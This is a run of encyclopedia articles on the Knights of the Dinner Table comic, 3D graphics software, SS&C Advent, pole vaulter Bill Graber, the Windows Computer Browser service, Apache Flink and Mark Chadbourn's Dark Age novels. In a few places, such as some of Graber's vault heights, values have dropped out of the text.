(Li'l) Knobby Foot, the Untouchable Trio (Plus One)'s one-time loyal halfling torch-bearer, who fled with certain of the UT+1's possessions, including Knuckles' "dwarven warhorse" and El Ravager's "magic cow," when the group was in dire straits and Knuckles, El Ravager, and Teflon Billy decided to use Knobby Foot as food. They also once shaved his head and branded "slacker" on his forehead for falling asleep on guard duty. He defected to Sergeant Barringer during the Bag Wars, and later inherited his position as lord of Barringer City. He eventually became a sort of lich and served a villainous role during a major campaign to destroy Bag World.
Lord Gilead, formerly the henchman of one of Sara's HackMaster characters who became a charismatic noble lord after an unknown, potentially dangerous magical helmet which the Knights insisted that he should be the one to try out turned out to be the legendary Helm of Lordship. He now rules the land of Faengerie and looks down on the propensity of Teflon Billy, Knuckles and El Ravager to burn and slaughter their way through whatever kingdom they happen to be in. Gilead is known to be a "favored NPC" by B.A., who uses him as to foil many of the players' more absurd large-scale plans and actions.
Chelsie the Magic Cow, once owned by El Ravager and subsequently eaten by Li'l Knobby Foot. Originally she was an ordinary cow, grazing by the side of the road as mere flavor text. El Ravager insisted on investigating, and B.A.'s attempts dissuade them were met with more fervor and suspicion ("there must be something really special about that cow if he's trying to keep us away from it"). When Teflon Billy used Detect Magic on the cow, B.A. sarcastically declared that it radiated a blinding magical aura. El Ravager laid claim to the cow, named her Chelsie, and over the course of several adventures sought to determine her supposed magic abilities; sadly, he never succeeded. Poor Chelsie met her end as a meal and warm clothing for Li'l Knobby Foot when he fled for his life from the Untouchable Trio. There is a similar story regarding Knuckles and a mule, though that was a case of deliberate trickery on the GM's part; B.A. convinced Knuckles (Bob's player) that "Little Mike" was actually a dwarven warhorse. Mike was also stolen by Knobby Foot, but was kept on as the former hireling's steed when Knobby Foot joined the Barringer rebellion. (Oddly enough, when KenzerCo published the actual rulebooks for HackMaster, the dwarven warhorse showed up on the equipment lists of the Player's Guide, along with a plethora of other items mentioned in the comic. However, it contains no references to magic cows, so Chelsie's special abilities remain a mystery.)
"Red" Gurdy Pickens, most often a bar-owner or piano player and nemesis of the Knights' Cattlepunk characters. From the players' perspective, the most feared of all of B.A.'s recurring NPCs; he is often recognized by description before being mentioned by name, eliciting a cry from the players (in unison) of "RED GURDY PICKENS?!". A Canadian descendant of Red even showed up in B.A.'s Hacknoia campaign to plague the Knights' agent characters. He was Resurrected yet again as the sheriff (and primary antagonist for the players) of the town of Lazarus, during Brian's Cattlepunk campaign. Red Gurdy Pickens appears as an NPC in Aces and Eights, the real-life analogue to Cattlepunk.
Alexis Marie (aka Lexie), supposedly Brian's girlfriend, but never seen by anyone else in the flesh. He talked about her larger-than-life adventures and careers for over two years before Bob and the other Knights decided the ruse was out of control; Brian had claimed they were engaged and even sent out wedding invitations. After a long, drawn-out intervention-type discussion, Brian was forced to admit that Alexis was not real. In a dramatic emotional outburst, he confessed he had created his own fantasy world, "Brian's Life", in order that he could feel loved (a sort of escape from the 'harsh edges' of the real world). Alexis is now a touchy subject among all the Knights, and any mention of her at the table tends to result in Brian unleashing a furious beatdown on the person who mentioned her.
Jonid Coincrawler, a gnomish thief and illusionist, who devises elaborate schemes to separate the Knights from their gold. In many cases, these schemes would not have worked as well as they did if it were not for the Knights simultaneously attempting an equally elaborate scheme to profit from a situation. In the "reality" of the comic strip, Jonid seems to be an established character from official HackMaster material rather than an original creation of B.A.'s, as he is mentioned in documents distributed by Hard Eight Enterprises.
Sergeant Barringer, the leader of a group of hirelings that the UT+1 placed inside a magical bag of holding in order to transport them more easily (in other words, less expensively than buying them all horses). After Teflon Billy, who was in charge of the bag, forgot to feed the hirelings or let them out of the bag for several months, he was shocked to discover that, rather than dying, they had created a fortress and society within "Bag World", living off the other resources that the Knights had stored there. This led to a conflict and eventually to several full-scale "Bag Wars" in which the Knights attempted to reclaim their items. In a more recent storyline, a campaign taking place generations after the end of the "Bag Wars" features the Knights' current characters entering Bag World and encountering societies descended from veterans of the wars; one of these settlements was "Barringer City," ruled by a corrupted Knobby Foot.
"Carvin' Marvin", an intelligent artifact-level magic sword who is completely insane and delights in having his wielder kill and maim anyone nearby and/or themselves. On occasion, however, he can be persuaded to pursue a more useful goal, and on those occasions serves as a very powerful and effective weapon. The last time Marvin was wielded resulted in a clash between him and Tremble, the Hackmaster +12 that (played by Nitro) had asserted control over Dave's character, with the result that every PC died and Marvin absorbed Tremble's power as his own. He waited centuries at 'Meatgrinder Rock,' luring in unsuspecting treasure hunters in and destroying them to create bodies for a mighty undead army. Eventually, the party returned to investigate the sword and Sara and Brian's characters got too close and became dominated by Marvin, who then used them to launch a campaign to conquer Garweeze World.
Pit bulls. The UT+1 discovered that the HackMaster rules allowed pit bulls to be purchased in large quantities from even the smallest village, making them a cheap but effective weapon en masse (though somewhat uncontrollable, since the cheap price was for untrained dogs). Unfortunately, when one of Sara's characters purchased a large group to run off guards transporting the other three player characters to justice, the dogs became feral and started gathering up every other pit bull in the country, one village at a time, until a vast pack of the dogs ('the Doomsday Pack') was killing everyone and every living thing which they came across, changing the face of Garweeze World.
Fictional games
Since the comic centers around a community of role-playing gamers, the characters are seen playing many games that are analogues of real-world games (some of which were then published as real-world games). They include:
Hackmaster, a fantasy role-playing game like Dungeons & Dragons, but even more baroquely complex. Hackmaster games are typically set in Garweeze Wurld, a reference to Gary Gygax's World of Greyhawk campaign setting. It is the game most often shown being played. Kenzer and Company has published multiple real-world versions of the game, including supplements with names taken from the comic (e.g. the Hacklopedia of Beasts guides to the monsters of Garweeze Wurld). In the very early Shadis scripts, the game the group plays is apparently called Dung & Dragons (although this is only seen on the back of B.A.'s GM screen). HackMaster is initially described as a home-brewed rule set by B.A., but was later declared to be a published product.
Spacehack, a science-fiction role-playing game like Traveller. Early strips implied this to be exactly the same game as HackMaster with different names, but it diverged later. One early storyline features the Knights' Spacehack characters traveling through a rift in space to Garweeze Wurld, where they encountered their Hackmaster characters. Several single-frame strips referring to SpaceHack were originally advertisement strips for the sci-fi RPG Fading Suns (which otherwise has no relationship to Hackmaster)
Scream of Kachooloo, a horror role-playing game closely modeled on Call of Cthulhu.
HackNoia, a modern-day espionage role-playing game like TSR's Top Secret.
Heroes and Zeroes, a superhero role-playing game like Champions.
Cattlepunk, a Western role-playing game like TSR's Boot Hill. The earliest strips call it Hackmaster: Cattlepunk, implying it may be a supplement or variation on that game. Kenzer and Company has published its own Western-themed game named Aces & Eights: Shattered Frontier.
Crime Nation, a role-playing game where the characters are gang members in a crime-ridden city.
Dawg: The RPG, a role-playing game, designed by B.A. Felton, where the characters are dogs of various breeds, similar to Bunnies & Burrows, which featured rabbit characters. Was self-published by B.A. and was a disastrous failure; the one time the group played it, the session consisted almost entirely of making "saving throws versus Canine Compulsion" to avoid their character acting like an actual dog. Was later picked up by Hard Eight after an intellectual property dispute with Heidi and "tidied up" by Jo Jo Zeke.
Vampyres: Lords of Darkness, a live-action role-playing game like White Wolf's Vampire: The Masquerade.
World of Hackcraft, a massively multiplayer on-line role-playing game set in Garweeze Wurld, modeled on World of Warcraft.
Spelljacked, a fantasy-themed collectible card game like Magic: The Gathering and Spellfire. Spelljacked is depicted as Hard Eight's failed attempt to cash in on the CCG craze; they were later forced to practically give away their remaining stocks of cards.
Fairy Meat, a miniatures game designed by Pete Ashton about cannibalistic fairies. Later published as a real-world game.
Risque, a board game of world conquest modeled on Risk.
Island of Kataan, a board game of building and trading modeled on The Settlers of Catan. When the Knights play it, most of them are baffled by its complete lack of rules for combat.
"TreasonHackers", a RPG that mimics "Paranoia". It only shows up in the animated YouTube videos, and Brain thinks it's a joke due to the high lethality rate.
RoadHack, a post-apocalypse highway game of car-to-car combat a la The Road Warrior, clearly based on Car Wars.
The Great War, an extremely detailed simulation of the First World War, costing several hundred dollars. A number of Muncie gamers formed the "Guns of August Society" to purchase and play it; over the years, all except Weird Pete and Brian have dropped out, and those two have been playing the game, at the rate of one turn per month, for fifteen years. When Johnny Kizinski briefly returned to the Society, he found that Pete and Brian had stopped attacking each other and were continuing to play the game peacefully simply to keep it running: Johnny attacked, upsetting the balance. A reference to the "monster games" of wargaming's past, such as SPI's War in Europe or GDW's Europa Series.
Virulence: The Game of Biological Warfare, a boardgame with both cooperative and competitive elements, centered around keeping a patient alive as it is attacked by various diseases while engineering diseases to attack other teams' patients. Similarly themed to the cooperative board game Pandemic.
Live readings
An event held at the Origins Game Fair, and possibly other Gaming conventions, is the Knights Of The Dinner Table live reading. People in attendance will put their name into a random drawing. The "winners" go up on stage, sit around a table, and act out the comic book, with hilarious results.
Affiliated products
Several games based on the comic have been published:
The boardgame Orcs At The Gates, published in 1998, and an expansion Orcs: The Reckoning in 1999. The base game won the 1999 Origins Award for Best Fantasy or Science Fiction Boardgame.
The card game Knights of the Dinner Table: HACK!, published in 2001.
Four Lost Worlds gamebooks were published by Flying Buffalo based on the comic's famous "Untouchable Trio +1" (Bob's "Knuckles", Dave's "El Ravager", Sara's "Thorina", and Brian's "Teflon Billy").
HackMaster, a real-world realization of the game played in the comic, was published by Kenzer and Company. Based on the first edition of Advanced Dungeons & Dragons (system used under license), it won the Origins Award for Game of the Year 2001.
In 2000, a monthly spin-off comic was created, titled Knights of the Dinner Table Illustrated, AKA K.ILL. The comic depicts many of the adventures described within KotDT; however, K.ILL shows the player characters' actions rather than those of the players behind them.
In 2018 a Kickstarted Live action show was produced. However, due to the mismanagement and misdoings of the Originator of the Kickstarter, Ken Whitman, now known as Whit Whitman, the 4TB harddrive with the footage was lost. Thankfully, a portion of the footage was recovered and Ben Dobyns of Zombie Orpheus Entertainment was able to make and send the backers a reconstructed version despite no obligation to do so.
See also
Nodwick, another roleplaying comic strip
Dork Tower, another roleplaying comic strip
The Order of the Stick, another roleplaying comic strip
Eric and the Dread Gazebo, a notorious gaming anecdote that provided the basis for one story in the comic's first issue.
References
External links
Official KoDT homepage
Official "Who's Who" of KoDT
1990 comics debuts
American comic strips
Gag-a-day comics
Origins Award winners
Role-playing game magazines
|
19495707
|
https://en.wikipedia.org/wiki/Comparison%20of%203D%20computer%20graphics%20software
|
Comparison of 3D computer graphics software
|
3D computer graphics software refers to programs used to create 3D computer-generated imagery.
General information
Current software
This table compares elements of notable software that is currently available, based on the raw software without the inclusion of additional plugins.
Inactive software
There are many discontinued software applications.
Operating system support
The operating systems on which the editors can run natively (without emulation or compatibility layers), meaning which operating systems have which editors specifically coded for them (not, for example, Wings 3D for Windows running on Linux with Wine).
Features
I/O
Image, video, and audio files
general 3D files
Game and renderer files
Cache and animation files
CAD files
Point clouds and photogrammetry files
GIS and DEM files
Supported primitives
Modeling
Lookdev / Shader writing
Lighting
Path-tracing Rendering
Level of Detail (LoD) Generation/Baking
See also
Comparison of raster graphics editors
Comparison of vector graphics editors
Comparison of computer-aided design editors
Comparison of CAD, CAM and CAE file viewers
References
3D computer graphics software
de:3D-Grafik-Software
fr:Logiciel de modélisation 3D
ja:3DCGソフトウェア
ro:Programe de grafică 3D
fi:Luettelo 3D-grafiikkaohjelmista
zh:三维计算机图形软件
|
12583652
|
https://en.wikipedia.org/wiki/SS%26C%20Advent
|
SS&C Advent
|
SS&C Advent (formerly Advent Software) is a business unit of SS&C Technologies.
Advent Software was founded in 1983 by Steve Strand and Stephanie DiMarco. DiMarco served as president and CEO until June 2012, at which point she stepped down and was succeeded by Peter Hess.
On July 8, 2015, Advent Software was acquired by SS&C Technologies and is now known as SS&C Advent.
Corporate identity
Logo design
References
External links
Companies based in San Francisco
Software companies established in 1983
Financial software companies
1983 establishments in California
2015 mergers and acquisitions
Software companies of the United States
Companies established in 1983
1983 establishments in the United States
|
32089562
|
https://en.wikipedia.org/wiki/Bill%20Graber
|
Bill Graber
|
William Noe Graber (January 21, 1911 – March 8, 1996) was an American pole vaulter. He broke the pole vault world record in 1932 and competed at the 1932 and 1936 Olympics, placing fourth and fifth, respectively.
Athletic career
Graber studied at the University of Southern California (USC), where he was coached by Dean Cromwell. As a sophomore in 1931 Graber won the pole vault at the IC4A championships and tied for first at the NCAA championships, helping the USC Trojans to team titles in both meets. At the IC4A meet in Philadelphia men's pole vault was the last event and Graber's meeting record of 14 ft in (4.28 m) secured the Trojans a narrow victory over Stanford University. Graber was only the fifth athlete in the world to jump 14 feet or more in a competition, and the only one to do so that year. Graber's NCAA jump of 13 ft in (4.22 m) was also a meeting record; the Trojans won that team title by a much more comfortable margin, scoring a record points and beating Ohio State by 46 points.
Graber repeated as IC4A champion 1932, although this time he only tied for first. He was unable to defend his NCAA title as the Trojans didn't compete in that meet. The American team for the Olympics in Los Angeles was selected at the Olympic Trials in Palo Alto, with the top three qualifying. Both Graber and Stanford's Bill Miller cleared 14 ft in (4.31 m), a fraction of an inch better than Lee Barnes's world record of 14 ft in (4.30 m). Graber then cleared 14 ft in (4.37 m) to obliterate the record; he said afterwards "it was the first time this year that I have been able to follow one good vault with another." The record established Graber as the leading favorite for the Olympics, but he underperformed and only jumped 13 ft in (4.15 m), placing fourth behind Miller, Japan's Shuhei Nishida and the other American entrant, George Jefferson.
Graber won his third IC4A title in 1933 in a five-way tie for first place. He also tied for first place at the NCAA meet, jumping 13 ft in (4.24 m) to break his own meeting record. In 1934 he was national champion indoors and tied for the title outdoors. He almost broke his own world record in April 1935 at Santa Barbara, clearing a bar supposedly at 14 ft in (4.41 m), but it was subsequently found that the take-off point had been two inches (5 cm) higher than the point of measurement and the record could not be ratified.
Entering the Olympic year of 1936, Graber was considered a leading candidate for his second Olympic Games. At the Olympic Trials at Randalls Island in New York City he cleared 14 ft 3 in (4.34 m), tying for first place with Bill Sefton and Earle Meadows. Meadows and Sefton both being USC undergraduates, it was the first time in the history of the Trials that one university had claimed the top three. George Varoff, who had been the favorite after breaking the world record the previous week, only cleared 14 ft (4.26 m) and didn't qualify for the team.
Graber was again a leading Olympic favorite, but again he failed to medal; at the Olympics he only managed 13 ft in (4.15 m) and placed 5th.
References
External links
Profile
1911 births
1996 deaths
Athletes (track and field) at the 1932 Summer Olympics
Athletes (track and field) at the 1936 Summer Olympics
People from Ontario, California
Olympic track and field athletes of the United States
American male pole vaulters
USC Trojans men's track and field athletes
|
20948437
|
https://en.wikipedia.org/wiki/Browser%20service
|
Browser service
|
Browser service or Computer Browser Service is a feature of Microsoft Windows to let users easily browse and locate shared resources in neighboring computers. This is done by aggregating the information in a single computer "Browse Master" (or "Master Browser"). All other computers contact this computer for information and display in the Network Neighborhood window.
Browser service runs on MailSlot / Server Message Block and thus can be used with all supported transport protocol such as NBF ("NetBEUI"), NBX (IPX/SPX) and NBT (TCP/IP). Browser service relies heavily on broadcast, so it is not available across network segments separated by routers. Browsing across different IP subnets need the help of Domain Master Browser, which is always the Primary Domain Controller (PDC). Therefore, browsing across IP subnets is not possible in a pure workgroup network.
In Windows XP
In Windows XP, Computer Browser Service provides backwards compatibility for versions that don't use Active Directory. For My Network Places, Windows Explorer, and the net view command, Computer Browser is still needed in XP.
Windows NT
Windows NT uses the Computer Browser service to collect and display all computers and other resources on the network. For example, opening Network Neighborhood displays the list of computers, shared folders, and printers; the Computer Browser service manages this list. Every time Windows NT boots up, this service also starts.
Computer Browser is responsible for two closely related services: building a list of available network resources, and sharing this list with other computers. All Windows NT computers run the Computer Browser service, but not all of them are responsible for building the list.
Most computers will only retrieve the list from the computers that actually collect the data and build it. Windows NT computers can therefore have different roles:
Domain master browser: In NT domains, the primary domain controllers (PDCs) handle this role. The PDCs maintain a list of all available network servers located on all subnets in the domain. They get the list for each subnet from the master browser for that subnet. On networks that have only one subnet, the PDC handles both the domain master browser and the master browser roles.
Master browsers: Computers maintaining this role build the browse list for servers on their own subnet and forward the list to the domain master browser and the backup browsers on its own subnet. There is one master browser per subnet.
Backup browsers: These computers distribute the list of available servers from master browsers and send them to individual computers requesting the information. For example, when you open Network Neighborhood, your computer contacts the backup browser and requests the list of all available servers.
Potential browsers: Some computers don't currently maintain the browse list, but they're capable of doing so if necessary, which designates them as potential browsers. If one of the existing browsers fails, potential browsers can take over.
Nonbrowsers: These are computers that aren't capable of maintaining and distributing a browse list.
References
External links
Microsoft: Description of the Microsoft Computer Browser Service
Microsoft: Computer Browser Service Technical Reference
Petri IT Knowledgebase: What’s the Microsoft Computer Browser Service?
Microsoft: Windows NT Browser Service (Chapter 3 of the Networking Guide of the Windows NT Server Resource Kit; for Windows NT 4.0 servers)
Microsoft: Troubleshooting the Microsoft Computer Browser Service (on Windows Server 2003, Windows 2000 and Windows NT 4.0)
Windows services
Local area networks
|
46228433
|
https://en.wikipedia.org/wiki/Apache%20Flink
|
Apache Flink
|
Apache Flink is an open-source, unified stream-processing and batch-processing framework developed by the Apache Software Foundation. The core of Apache Flink is a distributed streaming data-flow engine written in Java and Scala. Flink executes arbitrary dataflow programs in a data-parallel and pipelined (hence task parallel) manner. Flink's pipelined runtime system enables the execution of bulk/batch and stream processing programs. Furthermore, Flink's runtime supports the execution of iterative algorithms natively.
Flink provides a high-throughput, low-latency streaming engine as well as support for event-time processing and state management. Flink applications are fault-tolerant in the event of machine failure and support exactly-once semantics. Programs can be written in Java, Scala, Python, and SQL and are automatically compiled and optimized into dataflow programs that are executed in a cluster or cloud environment.
Flink does not provide its own data-storage system, but provides data-source and sink connectors to systems such as Amazon Kinesis, Apache Kafka, HDFS, Apache Cassandra, and ElasticSearch.
Development
Apache Flink is developed under the Apache License 2.0 by the Apache Flink Community within the Apache Software Foundation. The project is driven by over 25 committers and over 340 contributors.
Overview
Apache Flink's dataflow programming model provides event-at-a-time processing on both finite and infinite datasets. At a basic level, Flink programs consist of streams and transformations. “Conceptually, a stream is a (potentially never-ending) flow of data records, and a transformation is an operation that takes one or more streams as input, and produces one or more output streams as a result.”
Apache Flink includes two core APIs: a DataStream API for bounded or unbounded streams of data and a DataSet API for bounded data sets. Flink also offers a Table API, which is a SQL-like expression language for relational stream and batch processing that can be easily embedded in Flink's DataStream and DataSet APIs. The highest-level language supported by Flink is SQL, which is semantically similar to the Table API and represents programs as SQL query expressions.
Programming Model and Distributed Runtime
Upon execution, Flink programs are mapped to streaming dataflows. Every Flink dataflow starts with one or more sources (a data input, e.g., a message queue or a file system) and ends with one or more sinks (a data output, e.g., a message queue, file system, or database). An arbitrary number of transformations can be performed on the stream. These streams can be arranged as a directed, acyclic dataflow graph, allowing an application to branch and merge dataflows.
Flink offers ready-built source and sink connectors with Apache Kafka, Amazon Kinesis, HDFS, Apache Cassandra, and more.
Flink programs run as a distributed system within a cluster and can be deployed in a standalone mode as well as on YARN, Mesos, Docker-based setups along with other resource management frameworks.
State: Checkpoints, Savepoints, and Fault-tolerance
Apache Flink includes a lightweight fault tolerance mechanism based on distributed checkpoints. A checkpoint is an automatic, asynchronous snapshot of the state of an application and the position in a source stream. In the case of a failure, a Flink program with checkpointing enabled will, upon recovery, resume processing from the last completed checkpoint, ensuring that Flink maintains exactly-once state semantics within an application. The checkpointing mechanism exposes hooks for application code to include external systems into the checkpointing mechanism as well (like opening and committing transactions with a database system).
Flink also includes a mechanism called savepoints, which are manually-triggered checkpoints. A user can generate a savepoint, stop a running Flink program, then resume the program from the same application state and position in the stream. Savepoints enable updates to a Flink program or a Flink cluster without losing the application's state . As of Flink 1.2, savepoints also allow to restart an application with a different parallelism—allowing users to adapt to changing workloads.
DataStream API
Flink's DataStream API enables transformations (e.g. filters, aggregations, window functions) on bounded or unbounded streams of data. The DataStream API includes more than 20 different types of transformations and is available in Java and Scala.
A simple example of a stateful stream processing program is an application that emits a word count from a continuous input stream and groups the data in 5-second windows:import org.apache.flink.streaming.api.scala._
import org.apache.flink.streaming.api.windowing.time.Time
case class WordCount(word: String, count: Int)
object WindowWordCount {
def main(args: Array[String]) {
val env = StreamExecutionEnvironment.getExecutionEnvironment
val text = env.socketTextStream("localhost", 9999)
val counts = text.flatMap { _.toLowerCase.split("\\W+") filter { _.nonEmpty } }
.map { WordCount(_, 1) }
.keyBy("word")
.timeWindow(Time.seconds(5))
.sum("count")
counts.print
env.execute("Window Stream WordCount")
}
}
Apache Beam - Flink Runner
Apache Beam “provides an advanced unified programming model, allowing (a developer) to implement batch and streaming data processing jobs that can run on any execution engine.” The Apache Flink-on-Beam runner is the most feature-rich according to a capability matrix maintained by the Beam community.
data Artisans, in conjunction with the Apache Flink community, worked closely with the Beam community to develop a Flink runner.
DataSet API
Flink's DataSet API enables transformations (e.g., filters, mapping, joining, grouping) on bounded datasets. The DataSet API includes more than 20 different types of transformations. The API is available in Java, Scala and an experimental Python API. Flink's DataSet API is conceptually similar to the DataStream API.
Table API and SQL
Flink's Table API is a SQL-like expression language for relational stream and batch processing that can be embedded in Flink's Java and Scala DataSet and DataStream APIs. The Table API and SQL interface operate on a relational Table abstraction. Tables can be created from external data sources or from existing DataStreams and DataSets. The Table API supports relational operators such as selection, aggregation, and joins on Tables.
Tables can also be queried with regular SQL. The Table API and SQL offer equivalent functionality and can be mixed in the same program. When a Table is converted back into a DataSet or DataStream, the logical plan, which was defined by relational operators and SQL queries, is optimized using Apache Calcite and is transformed into a DataSet or DataStream program.
Flink Forward
Flink Forward is an annual conference about Apache Flink. The first edition of Flink Forward took place in 2015 in Berlin. The two-day conference had over 250 attendees from 16 countries. Sessions were organized in two tracks with over 30 technical presentations from Flink developers and one additional track with hands-on Flink training.
In 2016, 350 participants joined the conference and over 40 speakers presented technical talks in 3 parallel tracks. On the third day, attendees were invited to participate in hands-on training sessions.
In 2017, the event expands to San Francisco, as well. The conference day is dedicated to technical talks on how Flink is used in the enterprise, Flink system internals, ecosystem integrations with Flink, and the future of the platform. It features keynotes, talks from Flink users in industry and academia, and hands-on training sessions on Apache Flink.
In 2020, following the COVID-19 pandemic, Flink Forward's spring edition which was supposed to be hosted in San Francisco was canceled. Instead, the conference was hosted virtually, starting on April 22nd and concluding on April 24th, featuring live keynotes, Flink use cases, Apache Flink internals, and other topics on stream processing and real-time analytics.
History
In 2010, the research project "Stratosphere: Information Management on the Cloud" led by Volker Markl (funded by the German Research Foundation (DFG)) was started as a collaboration of Technical University Berlin, Humboldt-Universität zu Berlin, and Hasso-Plattner-Institut Potsdam. Flink started from a fork of Stratosphere's distributed execution engine and it became an Apache Incubator project in March 2014. In December 2014, Flink was accepted as an Apache top-level project.
Release Dates
09/2021: Apache Flink 1.14 (09/2021: v1.14.0; 12/2021: v1.14.2; 01/2022: v1.14.3)
05/2021: Apache Flink 1.13 (05/2021: v1.13.1; 08/2021: v1.13.2; 10/2021: v1.13.3; 12/2021: v1.13.5)
12/2020: Apache Flink 1.12 (01/2021: v1.12.1; 03/2021: v1.12.2; 04/2021: v1.12.3; 05/2021: v1.12.4; 08/2021: v1.12.5; 12/2021: v1.12.7)
07/2020: Apache Flink 1.11 (07/2020: v1.11.1; 09/2020: v1.11.2; 12/2020: v1.11.3; 08/2021: v1.11.4; 12/2021: v1.11.6)
02/2020: Apache Flink 1.10 (05/2020: v1.10.1; 08/2020: v1.10.2; 01/2021: v1.10.3)
08/2019: Apache Flink 1.9 (10/2019: v1.9.1; 01/2020: v1.9.2)
04/2019: Apache Flink 1.8 (07/2019: v1.8.1; 09/2019: v1.8.2; 12/2019: v1.8.3)
11/2018: Apache Flink 1.7 (12/2018: v1.7.1; 02/2019: v1.7.2)
08/2018: Apache Flink 1.6 (09/2018: v1.6.1; 10/2018: v1.6.2; 12/2018: v1.6.3; 02/2019: v1.6.4)
05/2018: Apache Flink 1.5 (07/2018: v1.5.1; 07/2018: v1.5.2; 08/2018: v1.5.3; 09/2018: v1.5.4; 10/2018: v1.5.5; 12/2018: v1.5.6)
12/2017: Apache Flink 1.4 (02/2018: v1.4.1; 03/2018: v1.4.2)
06/2017: Apache Flink 1.3 (06/2017: v1.3.1; 08/2017: v1.3.2; 03/2018: v1.3.3)
02/2017: Apache Flink 1.2 (04/2017: v1.2.1)
08/2016: Apache Flink 1.1 (08/2016: v1.1.1; 09/2016: v1.1.2; 10/2016: v1.1.3; 12/2016: v1.1.4; 03/2017: v1.1.5)
03/2016: Apache Flink 1.0 (04/2016: v1.0.1; 04/2016: v1.0.2; 05/2016: v1.0.3)
11/2015: Apache Flink 0.10 (11/2015: v0.10.1; 02/2016: v0.10.2)
06/2015: Apache Flink 0.9 (09/2015: v0.9.1)
04/2015: Apache Flink 0.9-milestone-1
Apache Incubator Release Dates
01/2015: Apache Flink 0.8-incubating
11/2014: Apache Flink 0.7-incubating
08/2014: Apache Flink 0.6-incubating (09/2014: v0.6.1-incubating)
05/2014: Stratosphere 0.5 (06/2014: v0.5.1; 07/2014: v0.5.2)
Pre-Apache Stratosphere Release Dates
01/2014: Stratosphere 0.4 (version 0.3 was skipped)
08/2012: Stratosphere 0.2
05/2011: Stratosphere 0.1 (08/2011: v0.1.1)
The 1.14.1, 1.13.4, 1.12.6, 1.11.5 releases, which were supposed to only contain a Log4j upgrade to 2.15.0, were skipped because was discovered during the release publication.
See also
List of Apache Software Foundation projects
References
External links
Flink
Free software programmed in Java (programming language)
Software using the Apache license
Free system software
Distributed stream processing
Articles with example Scala code
|
4839143
|
https://en.wikipedia.org/wiki/The%20Dark%20Age%20%28series%29
|
The Dark Age (series)
|
The Dark Age is a trilogy by Mark Chadbourn set around the beginning of the third millennium. While the previous series was a clear fantasy story, this has strings of gothic horror and existentialism woven into it.
The three books are:
The Devil in Green (2002)
The Queen of Sinister (2004)
The Hounds of Avalon (2005)
Although not a direct sequel to The Age of Misrule, it is a continuation of the world established by the end of this trilogy, the events of which are referred to as the Fall. It is followed by the Kingdom of the Serpent.
At first the books appear to be standalone novels, however ultimately they weave together to form one larger story, as sub-plots and themes coalesce in the final book, and only by reading that can you see how it all holds together. They do not need to be read in order of publication, although The Hounds of Avalon does bring together the characters from the other two and is set after the events of The Queen of Sinister and The Devil in Green.
This trilogy fits into a much bigger jigsaw, a sprawling story that covers two thousand years of history, multiple mythologies and two worlds, through The Age of Misrule and the Kingdom of the Serpent - again, the stories stand separately but a greater perception comes from reading all.
The Devil in Green has been described as "a sumptuous feast of fairytale, magic, dark gothic horror and romance."
All through his books Chadbourn buries archetypes, specifically those of Jung, to get across his ideas and tap into the subconscious. He has the Hero, The Great Mother The Wise old man The Trickster and the Child subtly underpinning his characters. But he makes sure his characters are real and flawed. His heroes are not stereotypical high born achievers but ordinary individuals from normal or hard backgrounds.
When interviewed about this series he has said:
Plot introduction and setting
The trilogy is set in Britain and the Otherworld or Far Lands. Technology is failing and magic has returned along with armies of mythical creatures, and Faerie folk from the Otherworld. Everyday people face the hardships of living in a world with little law and order, poor communications and a Government that is struggling to maintain power. Travelling is fraught with danger of attack from creatures and monsters from the Otherworld. Within the cities gang rule is taking place and it is never safe to venture out after dark.
Mark Chadbourn uses the gods of Celtic mythology referred to as the Tuatha Dé Danann within his books and the idea that Ley lines and ancient sites such as Stone Henge are connections to, and areas of, the Earth's energy which he calls the Blue Fire. The ancient sites act as gateways to the Otherworld. He draws on the theories of Brane cosmology to create a multiverse, where time in one dimension moves at a different rate from another; one hour in our world could be days or weeks in another.
Plot summary
The Devil in Green
The Devil in Green centres around Mallory, a recently recruited Knights Templar based at Salisbury Cathedral, his comrades and his relationship with a new age traveller/Wicca called Sophie. The Knights Templar and the remnants of the Christian Church are trying to restore some form of order within the sphere of their world.
During a mission to rescue a vicar, Mallory finds himself in one of the courts of the Otherworld where he learns of his destiny as a Brother of Dragons; one of 5 chosen by Existence to help restore the balance of light vs. dark in our world.
He returns to Salisbury to discover supernatural forces have surrounded the Cathedral laying it to siege. The priests become more fundamentalist after their leader is killed mysteriously and a sacred artefact with alleged powers is recovered.
It falls to Mallory, with the help of Sophie to end the siege and overthrow the fundamentalist priests. During the siege his friend, Miller, is nearly crucified but saved when Cernunnos places a fabulous beast hatchling within him, infusing him with the Blue Fire. This leaves Miller with the ability to heal the sick. The story concludes with Mallory and Sophie heading off in search of their fellow Brothers and Sisters of Dragons.
The title refers to Cernunnos: although he is worshipped by the pagans as a nature god and part of life, the Christians portray him as the Devil; hence, 'the Devil in Green'
The Queen of Sinister
An incurable plague is sweeping the country. Caitlin Shepherd, a local GP, is working all the hours to do what she can in her community. Caitlin's husband and young son succumb and die. Overcome by grief, Caitlin thinks she cannot continue, but is helped by her friend, Mary the local herbalist. Mary is visited by an old Professor named Crowther, who says Caitlin is a Sister of Dragons, and that she must find a cure for the plague in the Otherworld. Caitlin goes with Crowther, meeting up with three others; Mahalia, a teenage girl, Carlton, a mute boy, and lastly, Matt, who is looking for his missing daughter.
Whilst in the court of Lugh in the Otherworld they rescue Jack, a teenager from our world, who was taken as a baby by the Tuatha Dé Danann during The Age of Misrule He has had placed within him a powerful weapon known as a Wish Hex.
Caitlin is suffering from multiple personality disorder. Inside her mind are also Briony, Brigid, Amy, and a fourth persona that the others are terrified of. As Caitlin's group continue on their quest, Mary discovers that Caitlin is in danger, and sets off to help her. On the group’s journey to the House of Pain, the source of the plague, they are attacked and Caitlin is thrown back into our world, ending up in Birmingham
Here we meet Thackery and Harvey, struggling to survive against the local gang who are killing plague victims. Life is bleak within the city and little hope remains. Thackery finds and takes care of Caitlin, who has retreated into herself and is non-communicative.
Thackery is captured by the gang but rescued by Caitlin whose hidden persona emerges as The Morrigan. Caitlin, as The Morrigan, continues to the House of Pain. Once there she is given a choice to remain as its queen, with her son, in exchange for giving up being a Sister of Dragons, the fight for Existence and a cure for the plague.
Meanwhile, Mary’s quest reaches its conclusion and she must confront her past in order to help save Caitlin. This she achieves, the plague is stopped and the story concludes with Mahalia, Jack and Crowther heading off into the Otherworld, Caitlin no longer tied to the House of Pain, but also no longer a Sister of Dragons nor the Morrigan's host. Her son is now free to pass on to the Afterlife with her husband. Thackery and Harvey follow her to the House of Pain and leave it with her.
The title of the book is the position Caitlin is offered in her deal to save her son
The Hounds of Avalon
This story is set mainly in Oxford where the Government is trying to restore law and order after the Fall.
